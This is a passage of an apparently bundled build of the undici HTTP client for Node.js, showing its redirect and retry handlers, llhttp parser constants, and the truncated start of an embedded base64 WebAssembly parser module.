[Symbol.asyncIterator] () { - assert(!this[kBodyUsed], 'disturbed') - this[kBodyUsed] = true - yield * this[kBody] - } -} - -class RedirectHandler { - constructor (dispatch, maxRedirections, opts, handler) { - if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - util.validateHandler(handler, opts.method, opts.upgrade) - - this.dispatch = dispatch - this.location = null - this.abort = null - this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy - this.maxRedirections = maxRedirections - this.handler = handler - this.history = [] - - if (util.isStream(this.opts.body)) { - // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp - // so that it can be dispatched again? - // TODO (fix): Do we need 100-expect support to provide a way to do this properly? - if (util.bodyLength(this.opts.body) === 0) { - this.opts.body - .on('data', function () { - assert(false) - }) - } - - if (typeof this.opts.body.readableDidRead !== 'boolean') { - this.opts.body[kBodyUsed] = false - EE.prototype.on.call(this.opts.body, 'data', function () { - this[kBodyUsed] = true - }) - } - } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { - // TODO (fix): We can't access ReadableStream internal state - // to determine whether or not it has been disturbed. This is just - // a workaround. - this.opts.body = new BodyAsyncIterable(this.opts.body) - } else if ( - this.opts.body && - typeof this.opts.body !== 'string' && - !ArrayBuffer.isView(this.opts.body) && - util.isIterable(this.opts.body) - ) { - // TODO: Should we allow re-using iterable if !this.opts.idempotent - // or through some other flag? - this.opts.body = new BodyAsyncIterable(this.opts.body) - } - } - - onConnect (abort) { - this.abort = abort - this.handler.onConnect(abort, { history: this.history }) - } - - onUpgrade (statusCode, headers, socket) { - this.handler.onUpgrade(statusCode, headers, socket) - } - - onError (error) { - this.handler.onError(error) - } - - onHeaders (statusCode, headers, resume, statusText) { - this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) - ? null - : parseLocation(statusCode, headers) - - if (this.opts.origin) { - this.history.push(new URL(this.opts.path, this.opts.origin)) - } - - if (!this.location) { - return this.handler.onHeaders(statusCode, headers, resume, statusText) - } - - const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) - const path = search ? `${pathname}${search}` : pathname - - // Remove headers referring to the original URL. - // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. - // https://tools.ietf.org/html/rfc7231#section-6.4 - this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) - this.opts.path = path - this.opts.origin = origin - this.opts.maxRedirections = 0 - this.opts.query = null - - // https://tools.ietf.org/html/rfc7231#section-6.4.4 - // In case of HTTP 303, always replace method to be either HEAD or GET - if (statusCode === 303 && this.opts.method !== 'HEAD') { - this.opts.method = 'GET' - this.opts.body = null - } - } - - onData (chunk) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response bodies. - - Redirection is used to serve the requested resource from another URL, so it is assumes that - no body is generated (and thus can be ignored). Even though generating a body is not prohibited. - - For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually - (which means it's optional and not mandated) contain just an hyperlink to the value of - the Location response header, so the body can be ignored safely. - - For status 300, which is "Multiple Choices", the spec mentions both generating a Location - response header AND a response body with the other possible location to follow. - Since the spec explicitily chooses not to specify a format for such body and leave it to - servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. - */ - } else { - return this.handler.onData(chunk) - } - } - - onComplete (trailers) { - if (this.location) { - /* - https://tools.ietf.org/html/rfc7231#section-6.4 - - TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections - and neither are useful if present. - - See comment on onData method above for more detailed informations. - */ - - this.location = null - this.abort = null - - this.dispatch(this.opts, this) - } else { - this.handler.onComplete(trailers) - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) { - this.handler.onBodySent(chunk) - } - } -} - -function parseLocation (statusCode, headers) { - if (redirectableStatusCodes.indexOf(statusCode) === -1) { - return null - } - - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toString().toLowerCase() === 'location') { - return headers[i + 1] - } - } -} - -// https://tools.ietf.org/html/rfc7231#section-6.4.4 -function shouldRemoveHeader (header, removeContent, unknownOrigin) { - return ( - (header.length === 4 && header.toString().toLowerCase() === 'host') || - (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || - (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || - (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') - ) -} - -// https://tools.ietf.org/html/rfc7231#section-6.4 -function cleanRequestHeaders (headers, removeContent, unknownOrigin) { - const ret = [] - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { - ret.push(headers[i], headers[i + 1]) - } - } - } else if (headers && typeof headers === 'object') { - for (const key of Object.keys(headers)) { - if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { - ret.push(key, headers[key]) - } - } - } else { - assert(headers == null, 'headers must be an object or an array') - } - return ret -} - -module.exports = RedirectHandler - - -/***/ }), - -/***/ 2286: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) - -const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) -const { RequestRetryError } = __nccwpck_require__(8045) -const { isDisturbed, parseHeaders, parseRangeHeader } = __nccwpck_require__(3983) - -function calculateRetryAfterHeader (retryAfter) { - const current = Date.now() - const diff = new Date(retryAfter).getTime() - current - - return diff -} - -class RetryHandler { - constructor (opts, handlers) { - const { retryOptions, ...dispatchOpts } = opts - const { - // Retry scoped - retry: retryFn, - maxRetries, - maxTimeout, - minTimeout, - timeoutFactor, - // Response scoped - methods, - errorCodes, - retryAfter, - statusCodes - } = retryOptions ?? {} - - this.dispatch = handlers.dispatch - this.handler = handlers.handler - this.opts = dispatchOpts - this.abort = null - this.aborted = false - this.retryOpts = { - retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], - retryAfter: retryAfter ?? true, - maxTimeout: maxTimeout ?? 30 * 1000, // 30s, - timeout: minTimeout ?? 500, // .5s - timeoutFactor: timeoutFactor ?? 2, - maxRetries: maxRetries ?? 5, - // What errors we should retry - methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], - // Indicates which errors to retry - statusCodes: statusCodes ?? [500, 502, 503, 504, 429], - // List of errors to retry - errorCodes: errorCodes ?? [ - 'ECONNRESET', - 'ECONNREFUSED', - 'ENOTFOUND', - 'ENETDOWN', - 'ENETUNREACH', - 'EHOSTDOWN', - 'EHOSTUNREACH', - 'EPIPE' - ] - } - - this.retryCount = 0 - this.start = 0 - this.end = null - this.etag = null - this.resume = null - - // Handle possible onConnect duplication - this.handler.onConnect(reason => { - this.aborted = true - if (this.abort) { - this.abort(reason) - } else { - this.reason = reason - } - }) - } - - onRequestSent () { - if (this.handler.onRequestSent) { - this.handler.onRequestSent() - } - } - - onUpgrade (statusCode, headers, socket) { - if (this.handler.onUpgrade) { - this.handler.onUpgrade(statusCode, headers, socket) - } - } - - onConnect (abort) { - if (this.aborted) { - abort(this.reason) - } else { - this.abort = abort - } - } - - onBodySent (chunk) { - if (this.handler.onBodySent) return this.handler.onBodySent(chunk) - } - - static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { - const { statusCode, code, headers } = err - const { method, retryOptions } = opts - const { - maxRetries, - timeout, - maxTimeout, - timeoutFactor, - statusCodes, - errorCodes, - methods - } = retryOptions - let { counter, currentTimeout } = state - - currentTimeout = - currentTimeout != null && currentTimeout > 0 ? currentTimeout : timeout - - // Any code that is not a Undici's originated and allowed to retry - if ( - code && - code !== 'UND_ERR_REQ_RETRY' && - code !== 'UND_ERR_SOCKET' && - !errorCodes.includes(code) - ) { - cb(err) - return - } - - // If a set of method are provided and the current method is not in the list - if (Array.isArray(methods) && !methods.includes(method)) { - cb(err) - return - } - - // If a set of status code are provided and the current status code is not in the list - if ( - statusCode != null && - Array.isArray(statusCodes) && - !statusCodes.includes(statusCode) - ) { - cb(err) - return - } - - // If we reached the max number of retries - if (counter > maxRetries) { - cb(err) - return - } - - let retryAfterHeader = headers != null && headers['retry-after'] - if (retryAfterHeader) { - retryAfterHeader = Number(retryAfterHeader) - retryAfterHeader = isNaN(retryAfterHeader) - ? calculateRetryAfterHeader(retryAfterHeader) - : retryAfterHeader * 1e3 // Retry-After is in seconds - } - - const retryTimeout = - retryAfterHeader > 0 - ? Math.min(retryAfterHeader, maxTimeout) - : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) - - state.currentTimeout = retryTimeout - - setTimeout(() => cb(null), retryTimeout) - } - - onHeaders (statusCode, rawHeaders, resume, statusMessage) { - const headers = parseHeaders(rawHeaders) - - this.retryCount += 1 - - if (statusCode >= 300) { - this.abort( - new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Checkpoint for resume from where we left it - if (this.resume != null) { - this.resume = null - - if (statusCode !== 206) { - return true - } - - const contentRange = parseRangeHeader(headers['content-range']) - // If no content range - if (!contentRange) { - this.abort( - new RequestRetryError('Content-Range mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - // Let's start with a weak etag check - if (this.etag != null && this.etag !== headers.etag) { - this.abort( - new RequestRetryError('ETag mismatch', statusCode, { - headers, - count: this.retryCount - }) - ) - return false - } - - const { start, size, end = size } = contentRange - - assert(this.start === start, 'content-range mismatch') - assert(this.end == null || this.end === end, 'content-range mismatch') - - this.resume = resume - return true - } - - if (this.end == null) { - if (statusCode === 206) { - // First time we receive 206 - const range = parseRangeHeader(headers['content-range']) - - if (range == null) { - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const { start, size, end = size } = range - - assert( - start != null && Number.isFinite(start) && this.start !== start, - 'content-range mismatch' - ) - assert(Number.isFinite(start)) - assert( - end != null && Number.isFinite(end) && this.end !== end, - 'invalid content-length' - ) - - this.start = start - this.end = end - } - - // We make our best to checkpoint the body for further range headers - if (this.end == null) { - const contentLength = headers['content-length'] - this.end = contentLength != null ? Number(contentLength) : null - } - - assert(Number.isFinite(this.start)) - assert( - this.end == null || Number.isFinite(this.end), - 'invalid content-length' - ) - - this.resume = resume - this.etag = headers.etag != null ? headers.etag : null - - return this.handler.onHeaders( - statusCode, - rawHeaders, - resume, - statusMessage - ) - } - - const err = new RequestRetryError('Request failed', statusCode, { - headers, - count: this.retryCount - }) - - this.abort(err) - - return false - } - - onData (chunk) { - this.start += chunk.length - - return this.handler.onData(chunk) - } - - onComplete (rawTrailers) { - this.retryCount = 0 - return this.handler.onComplete(rawTrailers) - } - - onError (err) { - if (this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - this.retryOpts.retry( - err, - { - state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, - opts: { retryOptions: this.retryOpts, ...this.opts } - }, - onRetry.bind(this) - ) - - function onRetry (err) { - if (err != null || this.aborted || isDisturbed(this.opts.body)) { - return this.handler.onError(err) - } - - if (this.start !== 0) { - this.opts = { - ...this.opts, - headers: { - ...this.opts.headers, - range: `bytes=${this.start}-${this.end ?? ''}` - } - } - } - - try { - this.dispatch(this.opts, this) - } catch (err) { - this.handler.onError(err) - } - } - } -} - -module.exports = RetryHandler - - -/***/ }), - -/***/ 8861: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const RedirectHandler = __nccwpck_require__(2860) - -function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { - return (dispatch) => { - return function Intercept (opts, handler) { - const { maxRedirections = defaultMaxRedirections } = opts - - if (!maxRedirections) { - return dispatch(opts, handler) - } - - const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) - opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. - return dispatch(opts, redirectHandler) - } - } -} - -module.exports = createRedirectInterceptor - - -/***/ }), - -/***/ 953: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; -const utils_1 = __nccwpck_require__(1891); -// C headers -var ERROR; -(function (ERROR) { - ERROR[ERROR["OK"] = 0] = "OK"; - ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; - ERROR[ERROR["STRICT"] = 2] = "STRICT"; - ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; - ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; - ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; - ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; - ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; - ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; - ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; - ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; - ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; - ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; - ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; - ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; - ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; - ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; - ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; - ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; - ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; - ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; - ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; - ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; - ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; - ERROR[ERROR["USER"] = 24] = "USER"; -})(ERROR = exports.ERROR || (exports.ERROR = {})); -var TYPE; -(function (TYPE) { - TYPE[TYPE["BOTH"] = 0] = "BOTH"; - TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; - TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; -})(TYPE = exports.TYPE || (exports.TYPE = {})); -var FLAGS; -(function (FLAGS) { - FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; - FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; - FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; - FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; - FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; - FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; - FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; - FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; - // 1 << 8 is unused - FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; -})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); -var LENIENT_FLAGS; -(function (LENIENT_FLAGS) { - LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; - LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; - LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; -})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); -var METHODS; -(function (METHODS) { - METHODS[METHODS["DELETE"] = 0] = "DELETE"; - METHODS[METHODS["GET"] = 1] = "GET"; - METHODS[METHODS["HEAD"] = 2] = "HEAD"; - METHODS[METHODS["POST"] = 3] = "POST"; - METHODS[METHODS["PUT"] = 4] = "PUT"; - /* pathological */ - METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; - METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; - METHODS[METHODS["TRACE"] = 7] = "TRACE"; - /* WebDAV */ - METHODS[METHODS["COPY"] = 8] = "COPY"; - METHODS[METHODS["LOCK"] = 9] = "LOCK"; - METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; - METHODS[METHODS["MOVE"] = 11] = "MOVE"; - METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; - METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; - METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; - METHODS[METHODS["UNLOCK"] = 15] = "UNLOCK"; - METHODS[METHODS["BIND"] = 16] = "BIND"; - METHODS[METHODS["REBIND"] = 17] = "REBIND"; - METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; - METHODS[METHODS["ACL"] = 19] = "ACL"; - /* subversion */ - METHODS[METHODS["REPORT"] = 20] = "REPORT"; - METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; - METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; - METHODS[METHODS["MERGE"] = 23] = "MERGE"; - /* upnp */ - METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; - METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; - METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; - METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; - /* RFC-5789 */ - METHODS[METHODS["PATCH"] = 28] = "PATCH"; - METHODS[METHODS["PURGE"] = 29] = "PURGE"; - /* CalDAV */ - METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; - /* RFC-2068, section 19.6.1.2 */ - METHODS[METHODS["LINK"] = 31] = "LINK"; - METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; - /* icecast */ - METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; - /* RFC-7540, section 11.6 */ - METHODS[METHODS["PRI"] = 34] = "PRI"; - /* RFC-2326 RTSP */ - METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; - METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; - METHODS[METHODS["SETUP"] = 37] = "SETUP"; - METHODS[METHODS["PLAY"] = 38] = "PLAY"; - METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; - METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; - METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; - METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; - METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; - METHODS[METHODS["RECORD"] = 44] = "RECORD"; - /* RAOP */ - METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; -})(METHODS = exports.METHODS || (exports.METHODS = {})); -exports.METHODS_HTTP = [ - METHODS.DELETE, - METHODS.GET, - METHODS.HEAD, - METHODS.POST, - METHODS.PUT, - METHODS.CONNECT, - METHODS.OPTIONS, - METHODS.TRACE, - METHODS.COPY, - METHODS.LOCK, - METHODS.MKCOL, - METHODS.MOVE, - METHODS.PROPFIND, - METHODS.PROPPATCH, - METHODS.SEARCH, - METHODS.UNLOCK, - METHODS.BIND, - METHODS.REBIND, - METHODS.UNBIND, - METHODS.ACL, - METHODS.REPORT, - METHODS.MKACTIVITY, - METHODS.CHECKOUT, - METHODS.MERGE, - METHODS['M-SEARCH'], - METHODS.NOTIFY, - METHODS.SUBSCRIBE, - METHODS.UNSUBSCRIBE, - METHODS.PATCH, - METHODS.PURGE, - METHODS.MKCALENDAR, - METHODS.LINK, - METHODS.UNLINK, - METHODS.PRI, - // TODO(indutny): should we allow it with HTTP? - METHODS.SOURCE, -]; -exports.METHODS_ICE = [ - METHODS.SOURCE, -]; -exports.METHODS_RTSP = [ - METHODS.OPTIONS, - METHODS.DESCRIBE, - METHODS.ANNOUNCE, - METHODS.SETUP, - METHODS.PLAY, - METHODS.PAUSE, - METHODS.TEARDOWN, - METHODS.GET_PARAMETER, - METHODS.SET_PARAMETER, - METHODS.REDIRECT, - METHODS.RECORD, - METHODS.FLUSH, - // For AirPlay - METHODS.GET, - METHODS.POST, -]; -exports.METHOD_MAP = utils_1.enumToMap(METHODS); -exports.H_METHOD_MAP = {}; -Object.keys(exports.METHOD_MAP).forEach((key) => { - if (/^H/.test(key)) { - exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; - } -}); -var FINISH; -(function (FINISH) { - FINISH[FINISH["SAFE"] = 0] = "SAFE"; - FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; - FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; -})(FINISH = exports.FINISH || (exports.FINISH = {})); -exports.ALPHA = []; -for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { - // Upper case - exports.ALPHA.push(String.fromCharCode(i)); - // Lower case - exports.ALPHA.push(String.fromCharCode(i + 0x20)); -} -exports.NUM_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, -}; -exports.HEX_MAP = { - 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, - 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, - A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, - a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, -}; -exports.NUM = [ - '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', -]; -exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); -exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; -exports.USERINFO_CHARS = exports.ALPHANUM - .concat(exports.MARK) - .concat(['%', ';', ':', '&', '=', '+', '$', ',']); -// TODO(indutny): use RFC -exports.STRICT_URL_CHAR = [ - '!', '"', '$', '%', '&', '\'', - '(', ')', '*', '+', ',', '-', '.', '/', - ':', ';', '<', '=', '>', - '@', '[', '\\', ']', '^', '_', - '`', - '{', '|', '}', '~', -].concat(exports.ALPHANUM); -exports.URL_CHAR = exports.STRICT_URL_CHAR - .concat(['\t', '\f']); -// All characters with 0x80 bit set to 1 -for (let i = 0x80; i <= 0xff; i++) { - exports.URL_CHAR.push(i); -} -exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); -/* Tokens as defined by rfc 2616. Also lowercases them. - * token = 1* - * separators = "(" | ")" | "<" | ">" | "@" - * | "," | ";" | ":" | "\" | <"> - * | "/" | "[" | "]" | "?" | "=" - * | "{" | "}" | SP | HT - */ -exports.STRICT_TOKEN = [ - '!', '#', '$', '%', '&', '\'', - '*', '+', '-', '.', - '^', '_', '`', - '|', '~', -].concat(exports.ALPHANUM); -exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); -/* - * Verify that a char is a valid visible (printable) US-ASCII - * character or %x80-FF - */ -exports.HEADER_CHARS = ['\t']; -for (let i = 32; i <= 255; i++) { - if (i !== 127) { - exports.HEADER_CHARS.push(i); - } -} -// ',' = \x44 -exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); -exports.MAJOR = exports.NUM_MAP; -exports.MINOR = exports.MAJOR; -var HEADER_STATE; -(function (HEADER_STATE) { - HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; - HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; - HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; - HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; - HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; - HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; - HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; - HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; -})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); -exports.SPECIAL_HEADERS = { - 'connection': HEADER_STATE.CONNECTION, - 'content-length': HEADER_STATE.CONTENT_LENGTH, - 'proxy-connection': HEADER_STATE.CONNECTION, - 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, - 'upgrade': HEADER_STATE.UPGRADE, -}; -//# sourceMappingURL=constants.js.map - -/***/ }), - -/***/ 1145: -/***/ ((module) => { - -module.exports = 'AGFzbQEAAAABMAhgAX8Bf2ADf39/AX9gBH9/f38Bf2AAAGADf39/AGABfwBgAn9/AGAGf39/f39/AALLAQgDZW52GHdhc21fb25faGVhZGVyc19jb21wbGV0ZQACA2VudhV3YXNtX29uX21lc3NhZ2VfYmVnaW4AAANlbnYLd2FzbV9vbl91cmwAAQNlbnYOd2FzbV9vbl9zdGF0dXMAAQNlbnYUd2FzbV9vbl9oZWFkZXJfZmllbGQAAQNlbnYUd2FzbV9vbl9oZWFkZXJfdmFsdWUAAQNlbnYMd2FzbV9vbl9ib2R5AAEDZW52GHdhc21fb25fbWVzc2FnZV9jb21wbGV0ZQAAA0ZFAwMEAAAFAAAAAAAABQEFAAUFBQAABgAAAAAGBgYGAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAAABAQcAAAUFAwABBAUBcAESEgUDAQACBggBfwFBgNQECwfRBSIGbWVtb3J5AgALX2luaXRpYWxpemUACRlfX2luZGlyZWN0X2Z1bmN0aW9uX3RhYmxlAQALbGxodHRwX2luaXQAChhsbGh0dHBfc2hvdWxkX2tlZXBfYWxpdmUAQQxsbGh0dHBfYWxsb2MADAZtYWxsb2MARgtsbGh0dHBfZnJlZQANBGZyZWUASA9sbGh0dHBfZ2V0X3R5cGUADhVsbGh0dHBfZ2V0X2h0dHBfbWFqb3IADxVsbGh0dHBfZ2V0X2h0dHBfbWlub3IAEBFsbGh0dHBfZ2V0X21ldGhvZAARFmxsaHR0cF9nZXRfc3RhdHVzX2NvZGUAEhJsbGh0dHBfZ2V0X3VwZ3JhZGUAEwxsbGh0dHBfcmVzZXQAFA5sbGh0dHBfZXhlY3V0ZQAVFGxsaHR0cF9zZXR0aW5nc19pbml0ABYNbGxodHRwX2ZpbmlzaAAXDGxsaHR0cF9wYXVzZQAYDWxsaHR0cF9yZXN1bWUAGRtsbGh0dHBfcmVzdW1lX2FmdGVyX3VwZ3JhZGUAGhBsbGh0dHBfZ2V0X2Vycm5vABsXbGxodHRwX2dldF9lcnJvcl9yZWFzb24AHBdsbGh0dHBfc2V0X2Vycm9yX3JlYXNvbgAdFGxsaHR0cF9nZXRfZXJyb3JfcG9zAB4RbGxodHRwX2Vycm5vX25hbWUAHxJsbGh0dHBfbWV0aG9kX25hbWUAIBJsbGh0dHBfc3RhdHVzX25hbWUAIRpsbGh0dHBfc2V0X2xlbmllbnRfaGVhZGVycwAiIWxsaHR0cF9zZXRfbGVuaWVudF9jaHVua2VkX2xlbmd0aAAjHWxsaHR0cF9zZXRfbGVuaWVudF9rZWVwX2FsaXZlACQkbGxodHRwX3NldF9sZW5pZW50X3RyYW5zZmVyX2VuY29kaW5nACUYbGxodHRwX21lc3NhZ2VfbmVlZHNfZW9mAD8JFwEAQQELEQECAwQFCwYHNTk3MS8tJyspCsLgAkUCAAsIABCIgICAAAsZACAAEMKAgIAAGiAAIAI2AjggACABOgAoCxwAIAAgAC8BMiAALQAuIAAQwYCAgAAQgICAgAALKgEBf0HAABDGgICAACIBEMKAgIAAGiABQYCIgIAANgI4IAEgADoAKCABCwoAIAAQyICAgAALBwAgAC0AKAsHACAALQAqCwcAIAAtACsLBwAgAC0AKQsHACAALwEyCwcAIAAtAC4LRQEEfyAAKAIYIQEgAC0ALSECIAAtACghAyAAKAI4IQQgABDCgICAABogACAENgI4IAAgAzoAKCAAIAI6AC0gACABNgIYCxEAIAAgASABIAJqEMOAgIAACxAAIABBAEHcABDMgICAABoLZwEBf0EAIQECQCAAKAIMDQACQAJAAkACQCAALQAvDgMBAAMCCyAAKAI4IgFFDQAgASgCLCIBRQ0AIAAgARGAgICAAAAiAQ0DC0EADwsQyoCAgAAACyAAQcOWgIAANgIQQQ4hAQsgAQseAAJAIAAoAgwNACAAQdGbgIAANgIQIABBFTYCDAsLFgACQCAAKAI